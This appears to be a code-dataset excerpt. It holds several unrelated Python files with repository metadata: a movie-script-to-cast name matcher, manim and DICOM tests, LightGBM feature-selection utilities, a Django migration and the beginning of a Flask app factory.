self.dialog_count = utils.get_dialog_count(self.dialog)
# self.lev = LevSimilarity(threshold=0.8)
self.lcs = LCSSimilarity()
self.lcsdiff = LCSDiffSimilarity(threshold=0.8)
self.sim = self.lcsdiff
def map(self):
print("Processing Movie %s" % self.dialog['title'])
self._reduce_characters()
self.parsed_to_count = [(x, self.dialog_count[x]) for x in self.parsed_characters]
self.parsed_to_count.sort(key=lambda x: x[1], reverse=True)
self.char_map = {}
if DEBUG:
print("Number of parsed characters %d" % len(self.parsed_characters))
print("Number of actual characters %d" % len(self.actual_characters))
print("--------")
print("Dialog Count:")
for key, value in self.dialog_count.items():
print('%s,%s' % (key.encode(), value))
print("--------")
unmapped_parsed = set(self.parsed_characters)
unmapped_actual = set(self.actual_characters)
# map extremely close matches
self._map_characters(unmapped_parsed, unmapped_actual, sim=self.sim, threshold=0.98)
if DEBUG:
print("---------------------------------")
print("Unmapped parsed characters: %d: " % len(unmapped_parsed))
print("Unmapped actual characters: %d: " % len(unmapped_actual))
print("---------------------------------")
for key, value in self.char_map.items():
print('%s,%s' % (key.encode(), value.encode()))
# map the top 15 cast
for character in self.actual_characters[0:15]:
if character not in unmapped_actual:
continue
if len(unmapped_parsed) == 0:
break
for t in reversed(range(5,10)):
threshold = float(t)/10.0
self.sim.threshold = threshold
self._map_specific_char(unmapped_parsed, unmapped_actual, character, sim=self.sim, dialog_threshold=4)
if character not in unmapped_actual:
break
if DEBUG:
print("---------------------------------")
print("After new heurstic")
print("Unmapped parsed characters: %d: " % len(unmapped_parsed))
print("Unmapped actual characters: %d: " % len(unmapped_actual))
print("---------------------------------")
for key, value in self.char_map.items():
print('%s,%s' % (key.encode(), value.encode()))
for character in self.actual_characters:
if character not in unmapped_actual:
continue
if len(unmapped_parsed) == 0:
break
for t in reversed(range(7,10)):
threshold = float(t)/10.0
self.sim.threshold = threshold
self._map_specific_char(unmapped_parsed, unmapped_actual, character, sim=self.sim, dialog_threshold=1)
if character not in unmapped_actual:
break
self.sim.threshold = 0.8
# Map those who have a lot of lines
if DEBUG:
print("Mapping talkative")
self._map_talkative_characters(unmapped_parsed, unmapped_actual, sim=self.sim, min_lines=10)
if DEBUG:
print("---------------------------------")
print("Unmapped parsed characters: %d: " % len(unmapped_parsed))
print("Unmapped actual characters: %d: " % len(unmapped_actual))
print("---------------------------------")
for key, value in self.char_map.items():
print('%s,%s' % (key.encode(), value.encode()))
if DEBUG:
print("Mapping all actuals")
for character in self.actual_characters:
if character not in unmapped_actual:
continue
if len(unmapped_parsed) == 0:
break
for t in reversed(range(5,7)):
threshold = float(t)/10.0
self.sim.threshold = threshold
self._map_specific_char(unmapped_parsed, unmapped_actual, character, sim=self.sim, dialog_threshold=1)
if character not in unmapped_actual:
break
self.sim.threshold = 0.6
# Final pass at talkative characters
self._map_talkative_characters(unmapped_parsed, unmapped_actual, sim=self.sim, min_lines=10)
if DEBUG:
print("---------------------------------")
print("Unmapped parsed characters: %d: " % len(unmapped_parsed), [x.encode() for x in unmapped_parsed])
print("Unmapped actual characters: %d: " % len(unmapped_actual), [x.encode() for x in unmapped_actual])
print("---------------------------------")
for key, value in self.char_map.items():
print('%s,%s' % (key.encode(), value.encode()))
self._update_dialog(unmapped_parsed, unmapped_actual)
bad_map = False
for char in self.actual_characters[0:8]:
if char in unmapped_actual and self.character_info[char]['character_order'] < 8:
print('%s with import %d is still unmapped' % (char, self.character_info[char]['character_order']))
bad_map = True
for tup in self.parsed_to_count:
if tup[1] > 10 and tup[0] in unmapped_parsed:
print("Character with a lot of dialog remains unmapped! %s" % tup[0])
bad_map = True
print("Finished processing movie %s with id %s" % (self.dialog['title'], self.dialog['tmdb_id']))
if bad_map and int(self.dialog['tmdb_id']):
raise BadMapException()
def _update_dialog(self, unmapped_parsed, unmapped_actual):
parsed_characters_left = list(self.char_map.keys())
self.dialog['characters'] = parsed_characters_left
extended_char_map = {}
for parsed, actual in self.char_map.items():
distance = self.sim.get_similarity(clean_name(parsed), clean_name(actual))
extended_char_map[parsed] = {
'actual_name': actual,
'similarity': distance,
'character_order': self.character_info[actual]['character_order'],
'celeb_id': self.character_info[actual]['celeb_id'],
'actual_full_name': self.character_info[actual]['name']
}
self.dialog['char_map'] = extended_char_map
self.dialog['dialog'] = [x for x in self.dialog['dialog'] if x['character'] in self.char_map or self.dialog_count[x['character']] > 1]
for line in self.dialog['dialog']:
line['celeb_id'] = self.character_info[self.char_map[line['character']]]['celeb_id'] if line['character'] in self.char_map else None
unmapped_actual_map = {}
for actual in unmapped_actual:
unmapped_actual_map[actual] = {
'actual_name': actual,
'character_order': self.character_info[actual]['character_order'],
'celeb_id': self.character_info[actual]['celeb_id'],
'actual_full_name': self.character_info[actual]['name']
}
self.dialog['unmapped_film_characters'] = unmapped_actual_map
self.dialog['unmapped_script_characters']= list(unmapped_parsed)
def _map_characters(self, unmapped_parsed, unmapped_actual, sim=None, threshold=0.9):
"""
Maps characters that just happen to match exactly
@param unmapped_parsed - the set of currently unmapped characters
@param unmapped_actual - the set of currently unmapped characters from the movie data.
"""
if sim is None:
sim = self.sim
df = self._init_similarity_dataframe(list(unmapped_parsed), list(unmapped_actual), self.parsed_cleaned_names, self.actual_cleaned_names, sim=sim)
removed_parsed, removed_actual, result = self._map_to_characters(df, char_map=self.char_map, sim=sim, threshold=threshold)
unmapped_parsed.symmetric_difference_update(removed_parsed)
unmapped_actual.symmetric_difference_update(removed_actual)
def _map_specific_char(self, unmapped_parsed, unmapped_actual, character, sim=None, dialog_threshold=4):
if sim is None:
sim = self.sim
similarities = self._get_similarity_to_parts(unmapped_parsed, unmapped_actual, character, sim, dialog_threshold=dialog_threshold)
exact_matches = [key for key,value in similarities.items() if value['exact']]
if len(exact_matches) == 1:
self.char_map[exact_matches[0]] = character
unmapped_actual.remove(character)
unmapped_parsed.remove(exact_matches[0])
return
elif len(exact_matches) > 1:
best_match = None
closest_val = sim.get_start_compare()
for exact in exact_matches:
# Break the tie by seeing which one is closer to the original name
similarity = sim.get_similarity(self.parsed_cleaned_names[exact], self.actual_cleaned_names[character])
if sim.is_closer(closest_val, similarity):
best_match = exact
closest_val = similarity
self.char_map[exact] = character
unmapped_actual.remove(character)
unmapped_parsed.remove(exact)
return
else:
# Nothing matches exactly; find the closest and see if it's within the threshold
best_match = None
closest_val = sim.get_start_compare()
for other, match_data in similarities.items():
similarity = match_data['similarity']
if sim.is_closer(closest_val, similarity):
best_match = other
closest_val = similarity
# if character == "Scarlett O'Donnell":
# print('foo')
# print(character, best_match, closest_val)
if sim.is_within_threshold(closest_val):
self.char_map[best_match] = character
unmapped_actual.remove(character)
unmapped_parsed.remove(best_match)
return
def _get_similarity_to_parts(self, unmapped_parsed, unmapped_actual, character, sim=None, dialog_threshold=4):
"""
Obtains the similarity of possible character names in the film metadata
to names obtained from the script
@param unmapped_parsed: set of unmapped characters from the script
@param unmapped_actual: set of unmapped characters from the metadata
@param actual_chars: iterable of characters to map from the metadata
@param sim: a similarity object
@param dialog_threshold: minimum number of lines the character from the script needs to have to be mapped
@returns {<scriptname>: {<possible_name>: {similarity: number, exact: boolean}}}
"""
if sim is None:
sim = self.sim
if len(unmapped_parsed) == 0:
raise BadMapException("Can't map character %s as there's no one left to map to!" % character.encode())
result = {}
possible_names = self._get_all_possible_cleaned_names(character)
for other in unmapped_parsed:
if self.dialog_count[other] < dialog_threshold:
continue
cleaned_other = self.parsed_cleaned_names[other]
for possible in possible_names:
similarity, exact = self._best_similarities_with_nicknames(possible, cleaned_other, sim=sim)
result.setdefault(other, {})[possible] = {
'similarity': similarity,
'exact': exact
}
ret = {}
for script_name, inner in result.items():
closest_val = sim.get_start_compare()
exact = False
for possible_name, results in inner.items():
similarity = results['similarity']
exact |= results['exact']
if sim.is_closer(closest_val, similarity):
closest_val = similarity
ret[script_name] = {
'similarity': closest_val,
'exact': exact
}
return ret
def _best_similarities_with_nicknames(self, cleaned_actual_name, cleaned_parsed_name, sim=None):
if sim is None:
sim = self.sim
parts = cleaned_actual_name.split(' ')
part_possibilities = []
for part in parts:
nicks = self.nicknames.get_nicknames(part, set())
nicks.add(part)
part_possibilities.append(list(nicks))
# https://stackoverflow.com/questions/798854/all-combinations-of-a-list-of-lists
combinations = list(itertools.product(*part_possibilities))
closest_val = sim.get_start_compare()
best_name = None
for combination in combinations:
name = clean_name(' '.join(combination))
similarity = sim.get_similarity(name, cleaned_parsed_name)
if sim.is_closer(closest_val, similarity):
best_name = name
closest_val = similarity
return closest_val, sim.is_exact_match(best_name, cleaned_parsed_name)
def _get_all_possible_cleaned_names(self, name):
cleaned_name = self.actual_cleaned_names[name]
parts = cleaned_name.split(" ")
# powerset; see https://docs.python.org/3.7/library/itertools.html#recipes
combinations = itertools.chain.from_iterable(itertools.combinations(parts, r) for r in range(1,len(parts)))
return [clean_name(' '.join(x)) for x in combinations]
def _map_specific_characters(self, unmapped_parsed, unmapped_actual, actual_chars, sim=None, dialog_threshold=4):
"""
maps characters from the film meta data to parsed characters
@param unmapped_parsed: set of unmapped characters from the script
@param unmapped_actual: set of unmapped characters from the metadata
@param actual_chars: iterable of characters to map from the metadata
@param sim: a similarity object
@param dialog_threshold: minimum number of lines the character from the script needs to have to be mapped
"""
if sim is None:
sim = self.sim
if len(unmapped_parsed) == 0 or len(unmapped_actual) == 0:
return
talkative_chars = [x[0] for x in self.parsed_to_count if x[0] in unmapped_parsed and x[1] >= dialog_threshold]
for char in actual_chars:
if char not in unmapped_actual:
continue
clean_char = self.actual_cleaned_names[char]
closest_val = sim.get_start_compare()
closest_name = None
for other in talkative_chars:
if other not in unmapped_parsed:
continue
clean_other = self.parsed_cleaned_names[other]
dist = sim.get_similarity(clean_char, clean_other)
if not sim.is_within_threshold(dist):
continue
if sim.is_closer(closest_val, dist):
closest_val = dist
closest_name = other
if closest_name is None:
# if DEBUG:
# print("could not find name similar to %s" % char.encode())
continue
self.char_map[closest_name] = char
unmapped_actual.remove(char)
unmapped_parsed.remove(closest_name)
def _map_talkative_characters(self, unmapped_parsed, unmapped_actual, min_lines=10, sim=None):
if sim is None:
sim = self.sim
if len(unmapped_parsed) == 0 or len(unmapped_actual) == 0:
return
talkative_chars = [x[0] for x in self.parsed_to_count if x[0] in unmapped_parsed and x[1] >= min_lines]
for char in talkative_chars:
clean_char = self.parsed_cleaned_names[char]
closest_val = sim.get_start_compare()
closest_name = None
for actual in unmapped_actual:
clean_actual = self.actual_cleaned_names[actual]
dist = sim.get_similarity(clean_char, clean_actual)
if sim.is_closer(closest_val, dist):
closest_val = dist
closest_name = actual
if closest_name is None:
continue
self.char_map[char] = closest_name
unmapped_parsed.remove(char)
unmapped_actual.remove(closest_name)
def _reduce_characters(self):
"""
Takes the list of characters parsed from the scripts
and attemps to find duplicates created due to script errors
"""
if DEBUG:
print("Number of characters %d" % len(self.parsed_characters))
self._dedupe_by_multi_name()
name_map = self._find_similar_names(self.parsed_characters, self.parsed_cleaned_names)
self._deduplicate_parsed_names(name_map)
def _deduplicate_parsed_names(self, name_map):
"""
Remove names if they're very very close to one another
"""
name_to_aliases = self._dedupe_by_script_error(name_map)
self._remove_aliases(name_to_aliases)
def _remove_aliases(self, name_to_aliases):
if DEBUG:
print("names to aliases:", name_to_aliases)
characters = set(self.parsed_characters)
for char, aliases in name_to_aliases.items():
for line in self.dialog['dialog']:
if line['character'] in aliases:
line['character'] = char
for alias in aliases:
if alias in characters:
characters.remove(alias)
self.parsed_characters = list(characters)
self.parsed_cleaned_names = {x: clean_name(x) for x in self.parsed_characters}
def _dedupe_by_script_error(self, name_map):
"""
Deduplicates by trying to find names that are off by a few characters.
Will not try on character names with not many characters in the name.
@param name_map: dict name -> aliases that are close
"""
ret = {}
removed = set()
for name in name_map.keys():
if name in removed:
continue
max_lines = self.dialog_count[name]
max_alias = name
aliases = self._get_aliases(name, name_map)
for alias in aliases:
line_count = self.dialog_count[name]
if line_count > max_lines:
max_lines = line_count
max_alias = alias
if max_alias in aliases:
aliases.remove(max_alias)
if max_alias != name:
aliases.add(name)
removed.update(aliases)
removed.add(name)
ret[max_alias] = aliases
return ret
def _dedupe_by_multi_name(self):
"""
See script argo. Not sure how many other scripts have this problem,
but basically some 'character names' are formatted as:
<char 1> <char 2>
when char 1 is talking to char 2
"""
result = {}
names = set(self.parsed_characters)
for name in names:
for other in names:
if name == other:
continue
if not other.startswith(name):
continue
rest = other[0:len(name)]
if rest in names:
result.setdefault(name, set()).add(other)
self._remove_aliases(result)
def _get_aliases(self, name, name_map):
aliases = set()
# Yes, this stupid recursion logic is kinda necessary.
# It's theoretically possible to create an infinite loop otherwise
self._get_aliases_recur(name, name_map, aliases)
if name in aliases:
aliases.remove(name)
return aliases
def _get_aliases_recur(self, name, name_map, aliases):
if name in aliases:
return
aliases.add(name)
for alias in name_map[name]:
self._get_aliases_recur(alias, name_map, aliases)
def _find_similar_names(self, names, cleaned_names, sim=None):
"""
Look for similar names among cleaned names, and
make a multimap from name to all names similar to it
"""
if sim is None:
sim = self.sim
multi_map = {}
for i in range(len(names) - 1):
char = names[i]
clean_char = cleaned_names[char]
if len(clean_char) <= 3:
continue
for j in range(i+1, len(names)):
other = names[j]
clean_other = cleaned_names[other]
if len(clean_other) <= 3:
continue
if self.dialog_count[char] > 10 and self.dialog_count[other] > 10:
# concerned about cases where core characters have very similar names
continue
# similarity = editdistance.eval(clean_char, clean_other)
# if similarity < 2:
if sim.is_within_threshold(sim.get_similarity(clean_char, clean_other),0.95):
multi_map.setdefault(char, set()).add(other)
multi_map.setdefault(other, set()).add(char)
return multi_map
def _init_similarity_dataframe(self, parsed_characters, actual_characters, parsed_map, actual_map, sim=None):
if sim is None:
sim = self.sim
df = pd.DataFrame({'parsed_name': parsed_characters})
df.set_index('parsed_name', inplace=True)
for char in actual_characters:
df[char] = 0.0
for row in df.itertuples():
for col in df.columns:
df.loc[row.Index, col] = sim.get_similarity(parsed_map[row.Index], actual_map[col])
return df
def _map_to_characters(self, df, char_map={}, sim=None, usemin=False, threshold=0.9):
"""
Maps characters
"""
if sim is None:
sim=self.sim
removed_parsed = set()
removed_actual = set()
while df.shape[0] > 0 and df.shape[1] > 0:
if usemin:
vals_col = df.idxmin(axis=1)
val = df.values.min()
else:
vals_col = df.idxmax(axis=1)
val = df.values.max()
if not sim.is_within_threshold(val, threshold):
break
rows_to_remove = set()
columns_to_remove = set()
for index, col in vals_col.iteritems():
if index in rows_to_remove or col in columns_to_remove:
continue
if val == df.loc[index, col]:
char_map[index] = col
rows_to_remove.add(index)
columns_to_remove.add(col)
df = df.drop(labels=rows_to_remove, axis=0)
df = df.drop(labels=columns_to_remove, axis=1)
if len(rows_to_remove) == 0:
break
removed_parsed = removed_parsed.union(rows_to_remove)
removed_actual = removed_actual.union(columns_to_remove)
return removed_parsed, removed_actual, char_map
def to_json(self, output_dir):
with open(os.path.join(output_dir, os.path.splitext(self.dialog['file'])[0] + '.json'),'w', encoding='utf-8') as f:
json.dump(self.dialog, f, indent=4)
def clean_name(name):
return sort_name(normalize_unicode_to_ascii(name))
def normalize_unicode_to_ascii(name):
tmp = unicodedata.normalize('NFKD', name).encode('ASCII', 'ignore')
val = tmp.decode('utf-8').lower()
val = re.sub('[^A-Za-z0-9 ]+', ' ', val)
val = re.sub('[\s]+', ' ', val)
return val
def sort_name(name):
parts = name.split(' ')
parts.sort()
return ' '.join(parts).strip()
class Similarity():
def get_similarity(self, name1, name2):
pass
def is_within_threshold(self,result, threshold=4):
pass
def get_start_compare(self):
pass
def is_exact_match(self, name1, name2):
pass
def is_closer(self,previous_result, current_result):
pass
class LCSSimilarity(Similarity):
def get_similarity(self, name1, name2):
lcs(name1, name2)
def is_within_threshold(self,result, threshold=4):
return result >= threshold
def get_start_compare(self):
return -1
def is_exact_match(self, name1, name2):
return self.get_similarity(name1, name2) == max(len(name1), len(name2))
def is_closer(self,previous_result, current_result):
return previous_result < current_result
class LCSDiffSimilarity(Similarity):
def __init__(self, threshold=0.0):
self.threshold = threshold
def get_similarity(self, name1, name2):
val = 0
total = len(name1) + len(name2)
val = lcs(name1, name2)
return 2*float(val)/float(total)
def is_within_threshold(self,result, threshold=None):
if threshold is None:
threshold = self.threshold
return result >= threshold
def get_start_compare(self):
return -1.0
def is_exact_match(self, name1, name2):
return self.get_similarity(name1, name2) > 0.995
def is_closer(self,previous_result, current_result):
return previous_result < current_result
# class LevSimilarity(Similarity):
# def __init__(self, threshold=0.0):
# self.threshold = threshold
# def get_similarity(self, name1, name2):
# total = float(len(name1) + len(name2))
# max_val = max(len(name1), len(name2))
# return float((max_val - editdistance.eval(name1, name2))*2) / total
# def is_within_threshold(self,result, threshold=None):
# if threshold is None:
# threshold = self.threshold
# return result >= threshold
# def get_start_compare(self):
# return -1.0
# def is_exact_match(self, name1, name2):
# return self.get_similarity(name1, name2) > 0.995
# def is_closer(self, previous_result, current_result):
# return previous_result < current_result
class NicknameMap():
def __init__(self, namesfile):
self._map = {}
with open(namesfile, 'r', encoding='utf-8') as f:
reader = csv.reader(f)
for row in reader:
row = [clean_name(x) for x in row]
name = row[0]
for i in range(1, len(row)):
self._map.setdefault(name, set()).add(row[i])
self._map.setdefault(row[i], set()).add(name)
def get_nicknames(self, name, default=None):
if type(default) is set:
return set(self._map.get(name, default))
else:
return self._map.get(name, default)
def parse_args(*args):
parser = argparse.ArgumentParser(description='Map characters to cast')
parser.add_argument('-i', '--input', help='The input; accepts either a directory or a file; if a directory, then map using the entire directory',
required=True)
parser.add_argument('--cast_data', help='csv file with a list of the characters ("full_celeb_film_info.csv")', default='full_celeb_film_info.csv')
# See https://github.com/carltonnorthern/nickname-and-diminutive-names-lookup/blob/master/names.csv
parser.add_argument('--nickname_map', help='csv file with a mapping of names to nicknames', default='names.csv')
parser.add_argument('-o', '--output', help='output directory', required=True)
if len(args) > 1:
return parser.parse_args(args)
else:
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
main(args)
# main(r'E:\git\movie-analytics-112\processed_scripts\17-again.json', r'E:\git\movie-analytics-112\full_celeb_film_info.csv',os.path.join(os.getcwd(), 'mapped_scripts'))
| 18,809 | 12,773 | 853 |
63599d2a530e91d2e1d53e1418f911f544a0d91a | 295 | py | Python | tests/test_graphical_units/test_functions.py | osuzdalev/manim-1 | adab2430645637a5e7e73832d3a6ff9e7d390159 | [
"MIT"
] | 2 | 2021-08-22T14:51:53.000Z | 2021-10-17T16:01:24.000Z | tests/test_graphical_units/test_functions.py | osuzdalev/manim-1 | adab2430645637a5e7e73832d3a6ff9e7d390159 | [
"MIT"
] | null | null | null | tests/test_graphical_units/test_functions.py | osuzdalev/manim-1 | adab2430645637a5e7e73832d3a6ff9e7d390159 | [
"MIT"
] | 1 | 2021-03-31T20:46:51.000Z | 2021-03-31T20:46:51.000Z | from manim import *
from tests.test_graphical_units.testing.frames_comparison import frames_comparison
__module_test__ = "functions"
@frames_comparison
| 26.818182 | 87 | 0.762712 | from manim import *
from tests.test_graphical_units.testing.frames_comparison import frames_comparison
__module_test__ = "functions"
@frames_comparison
def test_FunctionGraph(scene):
graph = FunctionGraph(lambda x: 2 * np.cos(0.5 * x), x_range=[-PI, PI], color=BLUE)
scene.add(graph)
| 118 | 0 | 22 |
49ec8ce77ae6074466a6eae762a33a328017ef91 | 1,000 | py | Python | dcm/tests/store/test_local_dir.py | joshy/dcm | 7ee44b93f2d3c3f3638244791da9fdf9c331a9bb | [
"MIT"
] | 11 | 2021-05-07T08:37:56.000Z | 2022-03-23T17:05:08.000Z | dcm/tests/store/test_local_dir.py | joshy/dcm | 7ee44b93f2d3c3f3638244791da9fdf9c331a9bb | [
"MIT"
] | 4 | 2021-08-05T02:18:09.000Z | 2022-03-17T00:24:13.000Z | dcm/tests/store/test_local_dir.py | joshy/dcm | 7ee44b93f2d3c3f3638244791da9fdf9c331a9bb | [
"MIT"
] | 2 | 2021-08-04T06:33:42.000Z | 2022-01-12T12:09:22.000Z | import os
from pathlib import Path
from contextlib import AsyncExitStack
from tempfile import TemporaryDirectory
from glob import glob
import pydicom
from pytest import mark
from ...store.local_dir import LocalDir
from ..conftest import dicom_dir, dicom_files
@mark.asyncio
@mark.asyncio
| 27.027027 | 66 | 0.682 | import os
from pathlib import Path
from contextlib import AsyncExitStack
from tempfile import TemporaryDirectory
from glob import glob
import pydicom
from pytest import mark
from ...store.local_dir import LocalDir
from ..conftest import dicom_dir, dicom_files
@mark.asyncio
async def test_gen_chunks(make_local_dir):
local_dir, init_qr, _ = make_local_dir("all", max_chunk=2)
n_dcm_gen = 0
async for chunk in local_dir.gen_chunks():
async for dcm in chunk.gen_data():
print(dcm)
n_dcm_gen += 1
assert n_dcm_gen == len(init_qr)
@mark.asyncio
async def test_send(dicom_files):
with TemporaryDirectory() as tmp_dir:
local_dir = LocalDir(tmp_dir)
async with local_dir.send() as send_q:
for dcm_path in dicom_files:
dcm = pydicom.dcmread(str(dcm_path))
await send_q.put(dcm)
n_files = len(glob(tmp_dir + "/**/*.dcm", recursive=True))
assert n_files == len(dicom_files)
| 660 | 0 | 44 |
f2ba582488da19c49c781d84a748100228d2a6ee | 3,834 | py | Python | src/feature_selection.py | Benetti-Hub/Multiphase-Flow-Regimes | bd80439453469c0d6ff353dd42a2b00b2828bd2e | [
"Apache-2.0"
] | null | null | null | src/feature_selection.py | Benetti-Hub/Multiphase-Flow-Regimes | bd80439453469c0d6ff353dd42a2b00b2828bd2e | [
"Apache-2.0"
] | null | null | null | src/feature_selection.py | Benetti-Hub/Multiphase-Flow-Regimes | bd80439453469c0d6ff353dd42a2b00b2828bd2e | [
"Apache-2.0"
] | null | null | null | '''Utility functions for the Feature Selection Notebook'''
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score, f1_score
import lightgbm as lgbm
def plot_ANOVA(imp_f_classif, save=True):
'''
Plot the ANOVA feature importance graph,
If save is set to true, the image is saved
in Plots/FeatureSelection/ANOVA.png
Input:
imp_f_classif: ANOVA importance dataframe
Output:
The plot of feature importance based on ANOVA
'''
fig, axes = plt.subplots(figsize=(35,10))
axes.set_title("ANOVA F-statistics",fontsize=30)
plt.bar(range(imp_f_classif.shape[0]), imp_f_classif.F_score, align="center")
plt.xticks(range(imp_f_classif.shape[0]), imp_f_classif['Features'], rotation='vertical', fontsize=30)
plt.yticks(fontsize=30)
plt.xlim([-1, imp_f_classif.shape[0]])
plt.grid(True)
plt.ylabel('F(λ)', fontsize=30)
plt.xlabel('Feature', fontsize=30)
if save:
plt.savefig(f'plots/feature_selection/ANOVA.png', dpi=fig.dpi, bbox_inches='tight')
return plt.show()
def generate_SFFSinfo(X, y, l, cv=5, balance_method=None):
'''
This function will generate additional info for the
SFFS. In particular, it will collect F1-macro averaged
score and the mean accuracy for each feature subset.
Input:
X: the features
y: the targets
l: list of selected features
cv: number of cross validation folds
balance_method: (optional) oversampling method chosen
Output:
A dataframe containing the collected metrics
'''
info_di = {}
cv_info = np.zeros((cv, 2))
skf = StratifiedKFold(n_splits=cv, shuffle=True, random_state=42)
#Each feature selected by SFFS
for i, features in enumerate(l, start=1):
X_step = X[features].values
#Cross validation for each step
for j, (train_idx, valid_idx) in enumerate(skf.split(X_step, y)):
X_train, y_train = X_step[train_idx], y[train_idx]
X_valid, y_valid = X_step[valid_idx], y[valid_idx]
#Resample if required
if balance_method:
X_train, y_train = balance_method.fit_resample(X_train, y_train)
model = lgbm.LGBMClassifier()
model.fit(X_train, y_train)
y_pred = model.predict(X_valid)
cv_info[j, 0] = accuracy_score(y_valid, y_pred)
cv_info[j, 1] = f1_score(y_valid, y_pred, average='macro')
info_di[i] = {
'feature_names' : features,
'mean_acc' : np.mean(cv_info[:, 0]),
'std_acc' : np.std(cv_info[:, 0]),
'mean_f1' : np.mean(cv_info[:, 1]),
'std_f1' : np.std(cv_info[:, 1]),
}
return pd.DataFrame.from_dict(info_di).T
def plot_SFFS(scores, save=True):
'''
This function plot the results of SFFS.
If save is set to true, the image is saved
in Plots/FeatureSelection/SFFS.png
Input:
scores: the dataframe with SFFS results
Output:
The plot of SFFS results
'''
fig = plt.figure(figsize=(8, 6))
plt.errorbar(scores.index, scores['mean_acc'],
yerr=scores['std_acc'], label='Accuracy', linewidth=2)
plt.errorbar(scores.index, scores['mean_f1'],
yerr=scores['std_f1'], label='F1_score', linewidth=2)
plt.legend(loc='upper left')
plt.ylabel('Metric value')
plt.xlabel('Features used')
plt.grid(True)
if save:
plt.savefig(f'Plots/FeatureSelection/SFFS.png',
dpi=fig.dpi, bbox_inches='tight')
return plt.show()
| 31.42623 | 106 | 0.619718 | '''Utility functions for the Feature Selection Notebook'''
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score, f1_score
import lightgbm as lgbm
def plot_ANOVA(imp_f_classif, save=True):
'''
Plot the ANOVA feature importance graph,
If save is set to true, the image is saved
in Plots/FeatureSelection/ANOVA.png
Input:
imp_f_classif: ANOVA importance dataframe
Output:
The plot of feature importance based on ANOVA
'''
fig, axes = plt.subplots(figsize=(35,10))
axes.set_title("ANOVA F-statistics",fontsize=30)
plt.bar(range(imp_f_classif.shape[0]), imp_f_classif.F_score, align="center")
plt.xticks(range(imp_f_classif.shape[0]), imp_f_classif['Features'], rotation='vertical', fontsize=30)
plt.yticks(fontsize=30)
plt.xlim([-1, imp_f_classif.shape[0]])
plt.grid(True)
plt.ylabel('F(λ)', fontsize=30)
plt.xlabel('Feature', fontsize=30)
if save:
plt.savefig(f'plots/feature_selection/ANOVA.png', dpi=fig.dpi, bbox_inches='tight')
return plt.show()
def generate_SFFSinfo(X, y, l, cv=5, balance_method=None):
'''
This function will generate additional info for the
SFFS. In particular, it will collect F1-macro averaged
score and the mean accuracy for each feature subset.
Input:
X: the features
y: the targets
l: list of selected features
cv: number of cross validation folds
balance_method: (optional) oversampling method chosen
Output:
A dataframe containing the collected metrics
'''
info_di = {}
cv_info = np.zeros((cv, 2))
skf = StratifiedKFold(n_splits=cv, shuffle=True, random_state=42)
#Each feature selected by SFFS
for i, features in enumerate(l, start=1):
X_step = X[features].values
#Cross validation for each step
for j, (train_idx, valid_idx) in enumerate(skf.split(X_step, y)):
X_train, y_train = X_step[train_idx], y[train_idx]
X_valid, y_valid = X_step[valid_idx], y[valid_idx]
#Resample if required
if balance_method:
X_train, y_train = balance_method.fit_resample(X_train, y_train)
model = lgbm.LGBMClassifier()
model.fit(X_train, y_train)
y_pred = model.predict(X_valid)
cv_info[j, 0] = accuracy_score(y_valid, y_pred)
cv_info[j, 1] = f1_score(y_valid, y_pred, average='macro')
info_di[i] = {
'feature_names' : features,
'mean_acc' : np.mean(cv_info[:, 0]),
'std_acc' : np.std(cv_info[:, 0]),
'mean_f1' : np.mean(cv_info[:, 1]),
'std_f1' : np.std(cv_info[:, 1]),
}
return pd.DataFrame.from_dict(info_di).T
def plot_SFFS(scores, save=True):
'''
This function plot the results of SFFS.
If save is set to true, the image is saved
in Plots/FeatureSelection/SFFS.png
Input:
scores: the dataframe with SFFS results
Output:
The plot of SFFS results
'''
fig = plt.figure(figsize=(8, 6))
plt.errorbar(scores.index, scores['mean_acc'],
yerr=scores['std_acc'], label='Accuracy', linewidth=2)
plt.errorbar(scores.index, scores['mean_f1'],
yerr=scores['std_f1'], label='F1_score', linewidth=2)
plt.legend(loc='upper left')
plt.ylabel('Metric value')
plt.xlabel('Features used')
plt.grid(True)
if save:
plt.savefig(f'Plots/FeatureSelection/SFFS.png',
dpi=fig.dpi, bbox_inches='tight')
return plt.show()
| 0 | 0 | 0 |
9d8b56b7dd586d93afc47913b1898f5ab7883e14 | 341 | py | Python | tagging/migrations/0004_merge_20180921_1247.py | strugo/django-tagging | c7720535556c5f15aef0aaf392000b0c97965537 | [
"BSD-3-Clause"
] | 1 | 2021-02-14T18:49:18.000Z | 2021-02-14T18:49:18.000Z | tagging/migrations/0004_merge_20180921_1247.py | strugo/django-tagging | c7720535556c5f15aef0aaf392000b0c97965537 | [
"BSD-3-Clause"
] | null | null | null | tagging/migrations/0004_merge_20180921_1247.py | strugo/django-tagging | c7720535556c5f15aef0aaf392000b0c97965537 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-09-21 12:47
from __future__ import unicode_literals
from django.db import migrations
| 20.058824 | 49 | 0.665689 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-09-21 12:47
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('tagging', '0003_adapt_max_tag_length'),
('tagging', '0003_auto_20161115_0906'),
]
operations = [
]
| 0 | 169 | 23 |
d136f1527e08ce39d7b8a7e660f9c6532911f3ed | 1,509 | py | Python | shopyo/app.py | MrSunshyne/shopyo | cd3fe9942841743007f109e51469e8497680a678 | [
"MIT"
] | 1 | 2020-04-05T13:03:11.000Z | 2020-04-05T13:03:11.000Z | shopyo/app.py | MrSunshyne/shopyo | cd3fe9942841743007f109e51469e8497680a678 | [
"MIT"
] | null | null | null | shopyo/app.py | MrSunshyne/shopyo | cd3fe9942841743007f109e51469e8497680a678 | [
"MIT"
] | null | null | null | from flask import Flask, redirect
from flask_wtf.csrf import CSRFProtect
from addon import db, login_manager, ma
from config import app_config
app = create_app('development')
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
| 30.795918 | 69 | 0.777336 | from flask import Flask, redirect
from flask_wtf.csrf import CSRFProtect
from addon import db, login_manager, ma
from config import app_config
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(app_config[config_name])
db.init_app(app)
ma.init_app(app)
login_manager.init_app(app)
csrf = CSRFProtect(app) # noqa
